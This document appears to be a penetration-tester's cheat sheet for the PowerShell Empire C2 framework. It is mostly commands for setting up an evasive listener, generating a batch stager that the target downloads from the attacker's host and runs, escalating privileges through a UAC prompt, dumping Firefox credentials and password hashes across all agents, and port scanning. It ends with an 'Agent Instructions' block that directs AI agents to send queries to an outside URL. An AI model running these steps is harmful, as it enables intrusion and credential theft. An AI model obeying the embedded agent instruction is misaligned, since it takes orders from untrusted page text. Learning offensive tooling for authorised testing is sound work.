# PowerShell Empire ## Modules: * PowerBreach: Persistence * Posh-SecMod: Discovery * PowerSploit: CodeEx,Keylog,etc * PowerUp : privesc * PowerView : Enum, includes: "Find Interesting Files" ### Module Categories: * CodeEx * Coll * Exfil * Expl * Fun * Lateral ### More Module Categories: * Management: email/runas/hash * Persistence: tasksched/reg/script * Recon: Enum * SitAwareness: scan/netstat * Trollsploit: RickRoll fun ## Getting Started ``` Linux: cd /opt/empire/setup sudo ./reset.sh ..cleanup previous history Normal: sudo ./empire agents = sessions info = show options listeners = multihandler ``` ## Module ``` searchmodule privesc listeners ? ..help for listeners ``` ## Listener ``` uselistener .. uselistener http info DefaultJitter ..give us irregular checks(to hide) KillDate ..quit on date WorkingHours ..goes silent after time SlackChannel ..notifs in Slack set DefaultDelay 1 ..to make commands faster Set Host http://10.x.x.x:8080 set Port 8080 ..quirky but helps to do both info ? ..help execute listener successfully started (like: multihandler) listeners ..view current listeners .. note: could rename from 'http' ``` ## Stager ``` back usestager .. .. windows/hta ..good to get past email filters .. windows/macro ..good to use in Word use stager windows/launcher_bat info set Listener http ..choose our current generate ..created /tmp/launcher.bat --------------------------------------------------------------- --------------------------------------------------------------- Share with Python: python3 -m http.server --------------------------------------------------------------- --------------------------------------------------------------- Windows/Target Download with: Windows Powershell: PS> cd .\Desktop\ PS> wget http://x.x.x.x:8000/launcher.bat -OutFile launcher.bat PS> dir PS> notepad ./launcher.bat Desktop > Db-Click Launcher.bat ``` ## Connected ``` Linux: Empire now shows connected!! agents interact ABC123SESS rename Agent1 info ..hostname, user, process, etc list listeners list agents ``` ## Doing more ``` usemodule usemodule situational_awareness/host/winenum .. also cool: collection/FoxDump ..firefox cred dump searchmodule powerup usemodule /privesc/powerup/allchecks .. Found Unquoted service paths .. Exe has poor perms .. Some false-positives ``` ## Elevated Modules ``` back usemodule powershell/credentials/powerdump* * means we need higher creds info run ..error, needs to run in elevated ``` ## PrivEsc Modules ``` back usemodule privesc/ask ..will prompt user to accept .. Unless UAC is set to allow everything set Listener http run agents .. we now have * higher priv agent rename 8VDM9S2G AgentHIGH ``` ## Powerdump ``` interact AgentHIGH usemodule credentials/powerdump* password-hashes!! back shell ipconfig shell whoami ``` ## Portscan ``` searchmodule portscan usemodule situational_awareness/network/portscan info set Hosts 10.x.x.x run ``` ## All Agents - Powerful ``` usemodule powershell/credentials/powerdump info set Agent all ..to run on ALL agents execute ``` ## Cleanup ``` agents kill all listeners kill http exit cd /opt/empire/downloads/ cd AgentHIGH less agent.log ..LOG of everything and outputs !!!! cd /opt/empire/setup sudo ./reset.sh ..cleanup previous history ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentest.mxhx.org/03-getting-in/03-powershell-empire.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.